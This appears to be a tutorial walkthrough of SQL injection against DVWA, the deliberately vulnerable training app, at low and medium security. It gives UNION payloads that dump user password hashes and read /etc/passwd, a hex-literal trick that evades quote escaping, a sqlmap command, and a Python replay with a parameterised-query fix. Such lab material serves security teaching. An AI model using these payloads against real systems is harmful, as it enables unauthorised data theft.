HOWTO : DVWA SQL Injection

Security level = low

Type each payload below into the "User ID" field. The payloads assume the id is dropped into the query unquoted (WHERE user_id = $id). If your DVWA build wraps it in single quotes (WHERE user_id = '$id'), prefix each payload with ' to close the quote and append # to comment out the trailing quote; the column-count and UNION logic is otherwise identical.

99 or 1=1

- user_id = 99 matches nothing, but or 1=1 is true for every row, so all records are listed



99 or 1=1 union select 1,2,3

- MySQL returns the error "The used SELECT statements have a different number of columns": the original query selects two columns (first_name, last_name), so a UNION with three fails. Counting up or down until the error disappears is how you find the column count.



99 or 1=1 union select 1,2

- no error; all records are listed plus one extra row with 1 and 2 in the First name / Surname slots, confirming two columns and that both are rendered on the page



99 or 1=1 union select null,null

- same result but the extra row is blank; null is the safer placeholder because it fits any column type



99 or 1=1 union select version(),database()

- the two UNION columns land in the First name / Surname slots, so the extra row shows the MySQL version and the current database name (dvwa)



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- shows the MySQL account the web application connects as (DVWA's stock config uses root); which slot you put it in only changes where it is printed



99 or 1=1 union select null, table_name from information_schema.tables

- lists every table the database account can see, across all schemas (information_schema, mysql, dvwa, ...); the table_schema column of information_schema.tables lets you narrow it to dvwa



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'

- lists the columns of the users table, one row per column; 0x0a is a newline, which the browser collapses to whitespace unless you view the page source



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- dumps each user's first_name and password; DVWA stores passwords as unsalted MD5 hashes, so they have to be cracked offline



99 or 1=1 union select null,@@datadir

- shows MySQL's data directory path (e.g. /var/lib/mysql/), useful for locating database files on disk



99 or 1=1 union all select null,load_file('/etc/passwd')

- dumps the contents of /etc/passwd. This only works when the database account has the FILE privilege, secure_file_priv does not restrict the path, and the OS user mysqld runs as can read the file; otherwise load_file() silently returns NULL.



Security level = medium

Medium runs the id through mysql_real_escape_string() before inserting it, still unquoted, into the query. Quote characters get backslash-escaped, so purely numeric payloads keep working but quoted string literals do not.

99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- MySQL returns the error "The used SELECT statements have a different number of columns", exactly as at low: the original query still selects two columns



99 or 1=1 union select 1,2

- no error; all records are listed plus an extra row showing 1 and 2



99 or 1=1 union select null,null

- no error; all records are listed plus a blank extra row



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

- the escaping breaks the string literal 'users' (it becomes \'users\'), so a WHERE filter on the table name cannot be written with quotes; without the filter every column of every visible table is listed, and you pick out the users rows by hand



or



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- 0x7573657273 is the hex encoding of "users" (u=0x75 s=0x73 e=0x65 r=0x72 s=0x73); MySQL accepts a 0x... literal as a string in this comparison, so the WHERE filter works with no quote characters for the escaping to touch



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users table's first_name and password



99 or 1=1 union select null,@@datadir

- shows MySQL's data directory path, as at low; load_file() can be attempted here too, subject to the same FILE privilege and secure_file_priv limits
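To make the steps above reproducible without a DVWA install, here is an added example (my own code, not part of the original HOWTO or of DVWA) that rebuilds the DVWA-style lookup over an in-memory SQLite table and replays the payloads from both the low and the medium sections: the column-count probing with null, the first_name/password UNION dump, the quote-escaping that breaks 'users' at medium, and the hex literal that sidesteps it. The table layout and the three sample users are constructed to resemble DVWA's stock data, with the MD5 hashes computed in the code. SQLite stands in for MySQL: UNION and column-count errors behave the same, but string concatenation is || instead of concat(), and the 0x... string-literal trick is MySQL-specific, so only the encoding of that literal is shown.

```python
"""Added example: DVWA-style SQL injection replayed against SQLite."""
import hashlib
import sqlite3

# Constructed sample rows modelled on DVWA's stock users table (not real data).
SAMPLE_USERS = [
    (1, "admin", "admin", "password"),
    (2, "Gordon", "Brown", "abc123"),
    (3, "Hack", "Me", "charley"),
]


def build_db() -> sqlite3.Connection:
    """In-memory users table; passwords stored as unsalted MD5 like DVWA."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(uid, fn, ln, hashlib.md5(pw.encode()).hexdigest())
         for uid, fn, ln, pw in SAMPLE_USERS],
    )
    return conn


def vulnerable_lookup(conn, user_id: str) -> list:
    """Low/medium shape: the id is pasted straight into the SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {user_id}"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id: str) -> list:
    """The fix: a bound parameter is data, never SQL, so 'or 1=1' is just text."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def find_column_count(conn, max_cols: int = 10) -> int:
    """Replay the '1,2,3' -> '1,2' probing: grow the null list until no error."""
    for n in range(1, max_cols + 1):
        payload = "99 or 1=1 union select " + ",".join(["null"] * n)
        try:
            vulnerable_lookup(conn, payload)
            return n
        except sqlite3.OperationalError:
            # SQLite: "SELECTs to the left and right of UNION do not have the
            # same number of result columns" (MySQL's wording differs)
            continue
    raise RuntimeError("column count not found")


def medium_escape(value: str) -> str:
    """Approximation of mysql_real_escape_string(): backslash-escape quotes."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
            .replace('"', '\\"').replace("\x00", "\\0"))


def hex_literal(s: str) -> str:
    """'users' -> '0x7573657273': the quote-free string form MySQL accepts."""
    return "0x" + s.encode().hex()


def dump_credentials(conn) -> set:
    """The first_name/password UNION from the HOWTO (SQLite's || for concat)."""
    rows = vulnerable_lookup(
        conn, "99 or 1=1 union select null, first_name||':'||password from users"
    )
    # Injected rows carry null in the first column; real rows have a first_name.
    return {r[1] for r in rows if r[0] is None}


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "99 or 1=1"))          # every user
    print(find_column_count(db))                         # 2
    print(medium_escape("where table_name='users'"))    # quotes broken
    print(hex_literal("users"))                          # 0x7573657273
    for cred in sorted(dump_credentials(db)):
        print(cred)                                       # name:md5hash
    print(safe_lookup(db, "99 or 1=1"))                  # []
```

Run it as a script to see each step's output; the parameterised safe_lookup() returns nothing for the "99 or 1=1" payload because the whole string is compared as a value, which is the behaviour DVWA's high level approximates and the only real fix.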



sqlmap for Security = low



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

- --cookie carries the DVWA security level and your own PHPSESSID (copy it from the browser; the value above is the author's session and will not work for you)
- --string names a word that appears only in a "true" response ("Surname" is in the result table), so sqlmap can tell injected true and false pages apart
- -T users --columns enumerates the columns of the users table; add --dump to pull the rows (the password column holds MD5 hashes)

For Security = medium the same command works; change the cookie to security=medium.



That's all! See you!